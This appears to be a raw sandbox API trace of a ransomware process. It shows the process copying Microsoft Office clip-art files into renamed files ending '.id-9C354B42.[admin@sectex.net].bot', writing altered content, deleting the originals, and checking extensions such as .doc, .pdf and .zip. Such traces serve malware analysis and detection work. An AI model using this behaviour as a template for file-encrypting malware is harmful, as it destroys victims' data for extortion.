	[0150.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0150.417] GetLastError () returned 0x0
	[0150.417] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xd04, lpOverlapped=0x0) returned 1
	[0150.419] WriteFile (in: hFile=0x3d4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xd10, lpOverlapped=0x0) returned 1
	[0150.420] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.420] WriteFile (in: hFile=0x3d4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.420] SetEndOfFile (hFile=0x3d4) returned 1
	[0150.420] CloseHandle (hObject=0x3d4) returned 1
	[0150.420] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.420] SetEndOfFile (hFile=0x3e0) returned 1
	[0150.423] CloseHandle (hObject=0x3e0) returned 1
	[0150.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.424] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf")) returned 1
	[0150.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.424] lstrlenW (lpString=".doc") returned 4
	[0150.424] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.424] lstrlenW (lpString=".docx") returned 5
	[0150.424] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0150.424] lstrlenW (lpString=".pdf") returned 4
	[0150.424] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.424] lstrlenW (lpString=".xls") returned 4
	[0150.425] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.425] lstrlenW (lpString=".xlsx") returned 5
	[0150.425] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0150.425] lstrlenW (lpString=".ppt") returned 4
	[0150.425] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.425] lstrlenW (lpString=".zip") returned 4
	[0150.425] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.425] lstrlenW (lpString=".rar") returned 4
	[0150.425] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.425] lstrlenW (lpString=".bz2") returned 4
	[0150.425] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.425] lstrlenW (lpString=".7z") returned 3
	[0150.425] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.425] lstrlenW (lpString=".dbf") returned 4
	[0150.425] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.425] lstrlenW (lpString=".1cd") returned 4
	[0150.425] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.425] lstrlenW (lpString=".jpg") returned 4
	[0150.425] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.425] lstrlenW (lpString=".doc") returned 4
	[0150.425] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.425] lstrlenW (lpString=".docx") returned 5
	[0150.425] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0150.425] lstrlenW (lpString=".pdf") returned 4
	[0150.425] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.426] lstrlenW (lpString=".xls") returned 4
	[0150.426] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.426] lstrlenW (lpString=".xlsx") returned 5
	[0150.426] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0150.426] lstrlenW (lpString=".ppt") returned 4
	[0150.426] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.426] lstrlenW (lpString=".zip") returned 4
	[0150.426] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.426] lstrlenW (lpString=".rar") returned 4
	[0150.426] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.426] lstrlenW (lpString=".bz2") returned 4
	[0150.426] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.426] lstrlenW (lpString=".7z") returned 3
	[0150.426] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.426] lstrlenW (lpString=".dbf") returned 4
	[0150.426] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.426] lstrlenW (lpString=".1cd") returned 4
	[0150.426] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63
	[0150.426] lstrlenW (lpString=".jpg") returned 4
	[0150.426] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.426] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.426] lstrlenW (lpString="J0090779.WMF") returned 12
	[0150.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.427] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1456) returned 1
	[0150.427] CloseHandle (hObject=0x3e0) returned 1
	[0150.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf")) returned 0x20
	[0150.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.428] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.428] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0150.428] GetLastError () returned 0x0
	[0150.428] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x5b0, lpOverlapped=0x0) returned 1
	[0150.840] WriteFile (in: hFile=0x3d4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5c0, lpOverlapped=0x0) returned 1
	[0150.840] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.841] WriteFile (in: hFile=0x3d4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.841] SetEndOfFile (hFile=0x3d4) returned 1
	[0150.841] CloseHandle (hObject=0x3d4) returned 1
	[0150.841] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.841] SetEndOfFile (hFile=0x3e0) returned 1
	[0150.843] CloseHandle (hObject=0x3e0) returned 1
	[0150.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.870] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf")) returned 1
	[0150.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.870] lstrlenW (lpString=".doc") returned 4
	[0150.870] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.870] lstrlenW (lpString=".docx") returned 5
	[0150.870] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0150.870] lstrlenW (lpString=".pdf") returned 4
	[0150.870] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.870] lstrlenW (lpString=".xls") returned 4
	[0150.870] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.871] lstrlenW (lpString=".xlsx") returned 5
	[0150.871] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0150.871] lstrlenW (lpString=".ppt") returned 4
	[0150.871] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.871] lstrlenW (lpString=".zip") returned 4
	[0150.871] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.871] lstrlenW (lpString=".rar") returned 4
	[0150.871] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.871] lstrlenW (lpString=".bz2") returned 4
	[0150.871] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.871] lstrlenW (lpString=".7z") returned 3
	[0150.871] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.871] lstrlenW (lpString=".dbf") returned 4
	[0150.871] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.871] lstrlenW (lpString=".1cd") returned 4
	[0150.871] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.871] lstrlenW (lpString=".jpg") returned 4
	[0150.871] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.871] lstrlenW (lpString=".doc") returned 4
	[0150.871] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.871] lstrlenW (lpString=".docx") returned 5
	[0150.871] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0150.871] lstrlenW (lpString=".pdf") returned 4
	[0150.871] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.871] lstrlenW (lpString=".xls") returned 4
	[0150.872] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.872] lstrlenW (lpString=".xlsx") returned 5
	[0150.872] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0150.872] lstrlenW (lpString=".ppt") returned 4
	[0150.872] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.872] lstrlenW (lpString=".zip") returned 4
	[0150.872] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.872] lstrlenW (lpString=".rar") returned 4
	[0150.872] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.872] lstrlenW (lpString=".bz2") returned 4
	[0150.872] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.872] lstrlenW (lpString=".7z") returned 3
	[0150.872] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.872] lstrlenW (lpString=".dbf") returned 4
	[0150.872] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.872] lstrlenW (lpString=".1cd") returned 4
	[0150.872] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63
	[0150.872] lstrlenW (lpString=".jpg") returned 4
	[0150.872] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.872] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.872] lstrlenW (lpString="J0099146.WMF") returned 12
	[0150.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0150.874] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=16596) returned 1
	[0150.874] CloseHandle (hObject=0x268) returned 1
	[0150.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf")) returned 0x20
	[0150.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0150.875] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.875] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.876] GetLastError () returned 0x0
	[0150.876] ReadFile (in: hFile=0x268, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x40d4, lpOverlapped=0x0) returned 1
	[0150.939] WriteFile (in: hFile=0x3d0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x40e0, lpOverlapped=0x0) returned 1
	[0150.940] ReadFile (in: hFile=0x268, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.940] WriteFile (in: hFile=0x3d0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.940] SetEndOfFile (hFile=0x3d0) returned 1
	[0150.940] CloseHandle (hObject=0x3d0) returned 1
	[0150.940] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.940] SetEndOfFile (hFile=0x268) returned 1
	[0150.942] CloseHandle (hObject=0x268) returned 1
	[0150.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.943] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf")) returned 1
	[0150.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.943] lstrlenW (lpString=".doc") returned 4
	[0150.943] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.943] lstrlenW (lpString=".docx") returned 5
	[0150.944] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0150.944] lstrlenW (lpString=".pdf") returned 4
	[0150.944] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.944] lstrlenW (lpString=".xls") returned 4
	[0150.944] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.944] lstrlenW (lpString=".xlsx") returned 5
	[0150.944] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0150.944] lstrlenW (lpString=".ppt") returned 4
	[0150.944] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.944] lstrlenW (lpString=".zip") returned 4
	[0150.944] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.944] lstrlenW (lpString=".rar") returned 4
	[0150.944] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.944] lstrlenW (lpString=".bz2") returned 4
	[0150.944] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.944] lstrlenW (lpString=".7z") returned 3
	[0150.944] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.944] lstrlenW (lpString=".dbf") returned 4
	[0150.944] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.944] lstrlenW (lpString=".1cd") returned 4
	[0150.944] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.944] lstrlenW (lpString=".jpg") returned 4
	[0150.944] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.944] lstrlenW (lpString=".doc") returned 4
	[0150.944] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.945] lstrlenW (lpString=".docx") returned 5
	[0150.945] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0150.945] lstrlenW (lpString=".pdf") returned 4
	[0150.945] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.945] lstrlenW (lpString=".xls") returned 4
	[0150.945] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.945] lstrlenW (lpString=".xlsx") returned 5
	[0150.945] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0150.945] lstrlenW (lpString=".ppt") returned 4
	[0150.945] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.945] lstrlenW (lpString=".zip") returned 4
	[0150.945] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.945] lstrlenW (lpString=".rar") returned 4
	[0150.945] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.945] lstrlenW (lpString=".bz2") returned 4
	[0150.945] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.945] lstrlenW (lpString=".7z") returned 3
	[0150.945] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.945] lstrlenW (lpString=".dbf") returned 4
	[0150.945] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.945] lstrlenW (lpString=".1cd") returned 4
	[0150.945] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 63
	[0150.945] lstrlenW (lpString=".jpg") returned 4
	[0150.945] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.946] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.946] lstrlenW (lpString="J0099149.WMF") returned 12
	[0150.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0150.984] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=73214) returned 1
	[0150.984] CloseHandle (hObject=0x3b0) returned 1
	[0150.984] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf")) returned 0x20
	[0151.048] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0151.048] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.048] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
